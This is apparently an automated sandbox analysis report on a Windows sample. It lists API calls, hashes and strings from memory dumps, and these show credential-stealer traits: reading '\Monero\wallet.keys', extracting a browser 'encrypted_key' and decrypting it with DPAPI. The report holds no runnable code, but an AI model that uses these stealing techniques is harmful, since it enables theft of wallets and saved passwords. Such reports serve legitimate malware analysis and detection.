                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: f0e8411726db6e8f6c410efce1320233c6f3a8671e5e27ef0949bf1850ab0b63
                                • Instruction ID: 0263404eadca100e845e568f8faa69e07dde6df8409b0151bf006b43bf9f5773
                                • Opcode Fuzzy Hash: f0e8411726db6e8f6c410efce1320233c6f3a8671e5e27ef0949bf1850ab0b63
                                • Instruction Fuzzy Hash: A7312DB1801218ABDB18EB94DC96FEDBB78FF14304F404199F209A6191DF74AB49CF5A
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008D0E28,00000000,?), ref: 008C882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C8836
                                • wsprintfA.USER32 ref: 008C8850
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: ce3f8ec7ff4cb7f7497745c1adb2e08ef47fa54ec6b04a1087ec7820f026ace8
                                • Instruction ID: f46db14b3c5f590acffff3b90d2137ad1cce7e200fb9e6f175dac7cbd38d8b6c
                                • Opcode Fuzzy Hash: ce3f8ec7ff4cb7f7497745c1adb2e08ef47fa54ec6b04a1087ec7820f026ace8
                                • Instruction Fuzzy Hash: 1321DBB1A44208ABDB04DFD4DD49FBEBBB8FB48751F104119F609A7680C7799901CBA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008C951E,00000000), ref: 008C8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C8D62
                                • wsprintfW.USER32 ref: 008C8D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: f9c1327474a188c63b32322f99d8a93ed8077716c1861b1059243882e3748b61
                                • Instruction ID: 354db4ba1fd58bfe12408bed367ac9d8aec8ada76768b0a8bd9afc7f3dc04668
                                • Opcode Fuzzy Hash: f9c1327474a188c63b32322f99d8a93ed8077716c1861b1059243882e3748b61
                                • Instruction Fuzzy Hash: 64E046B1A40208BBC700DBD4DC0AEA977A8EB04702F000194FD0987280DAB19A019B92
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 008BA3FF
                                • lstrlen.KERNEL32(00000000), ref: 008BA6BC
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 008BA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: ec0997d6806d68b0805412fb1260a2c6a144bbad6c5f7433927f9cae3fca69ef
                                • Instruction ID: 19fb6208cf645959d29d81201b6b5106e249a4f8ccef4fc1ef7a34279921fd1c
                                • Opcode Fuzzy Hash: ec0997d6806d68b0805412fb1260a2c6a144bbad6c5f7433927f9cae3fca69ef
                                • Instruction Fuzzy Hash: 46E1BD728101189BDB18EBA8DC96EEE7338FF14304F50816DF516E6191EE34AA49CB67
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BD481
                                • lstrlen.KERNEL32(00000000), ref: 008BD698
                                • lstrlen.KERNEL32(00000000), ref: 008BD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 008BD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: abf4ae2050162ad18c870d5222af9a8b9d115bac71b4b53a23415eb24e5f2cab
                                • Instruction ID: e2337ba7dce7ef16be62b1e77f1148b1509983a88ba4355a0a039d85cf345b08
                                • Opcode Fuzzy Hash: abf4ae2050162ad18c870d5222af9a8b9d115bac71b4b53a23415eb24e5f2cab
                                • Instruction Fuzzy Hash: 6291CC729101189BDB18EBA8EC96EEE7338FF14304F50416DF516E6191EF34AA09CB67
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BD801
                                • lstrlen.KERNEL32(00000000), ref: 008BD99F
                                • lstrlen.KERNEL32(00000000), ref: 008BD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 008BDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d94fcd8244ec05124559be5811811602eda1b2fc6f99c5ce7d91b9cc1de89917
                                • Instruction ID: 1bd61b57404ee1c2750b3b3ded348a78d7f5f7ffa40becf79c6d409dda943e38
                                • Opcode Fuzzy Hash: d94fcd8244ec05124559be5811811602eda1b2fc6f99c5ce7d91b9cc1de89917
                                • Instruction Fuzzy Hash: BB81CA729101189BDB08EBA8EC96EEE7738FF14304F50452DF516E6191EE34AA09CB67
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,008D1580,008D0D92), ref: 008BF54C
                                • lstrlen.KERNEL32(00000000), ref: 008BF56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: c4df64520ea681b948d6b8fc1bf9a0a4141bf87f5893095856817afca1d3e107
                                • Instruction ID: b648b9ef32fd23592504e835ba98d0eb57419d2c23d6c3343dafd8d109843c68
                                • Opcode Fuzzy Hash: c4df64520ea681b948d6b8fc1bf9a0a4141bf87f5893095856817afca1d3e107
                                • Instruction Fuzzy Hash: 8F51D37191010CA7DB18FBA8EC96EED7778FF54304F40852DE516D6191EE349A09CBA3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: d725cba340f0f607585b26885617b3fd105bdafce071db2eb3bacd9a4f50835b
                                • Instruction ID: 4203855d27dcd97777f6ac77b3b111e3a154f2e940e4310d1fbbeb55bd9dbf4e
                                • Opcode Fuzzy Hash: d725cba340f0f607585b26885617b3fd105bdafce071db2eb3bacd9a4f50835b
                                • Instruction Fuzzy Hash: 5E413DB1D10109ABCB08EFE4D885FFEB774FB54708F10851CE416A6290DB75AA06DFA2
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008B9D39
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9AEF
                                  • Part of subcall function 008B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008B4EEE,00000000,?), ref: 008B9B01
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9B2A
                                  • Part of subcall function 008B9AC0: LocalFree.KERNEL32(?,?,?,?,008B4EEE,00000000,?), ref: 008B9B3F
                                  • Part of subcall function 008B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008B9B84
                                  • Part of subcall function 008B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 008B9BA3
                                  • Part of subcall function 008B9B60: LocalFree.KERNEL32(?), ref: 008B9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 01f24c761c70b04180e7de0e2e9958c825d0b3c36cb25ce6443725d4ed6ce55e
                                • Instruction ID: 9398c140e850d8cb048adc45898ba7ec5e5f85f2c27f0a8d42355ba1a0bb042d
                                • Opcode Fuzzy Hash: 01f24c761c70b04180e7de0e2e9958c825d0b3c36cb25ce6443725d4ed6ce55e
                                • Instruction Fuzzy Hash: 7B310DB5D10209ABCF14DBE8DC85EEEB7B8FF48304F144519EA55E7341EA359A04CBA1
                                APIs
                                • CreateFileA.KERNEL32(008C3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,008C3AEE,?), ref: 008C92FC
                                • GetFileSizeEx.KERNEL32(000000FF,008C3AEE), ref: 008C9319
                                • CloseHandle.KERNEL32(000000FF), ref: 008C9327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
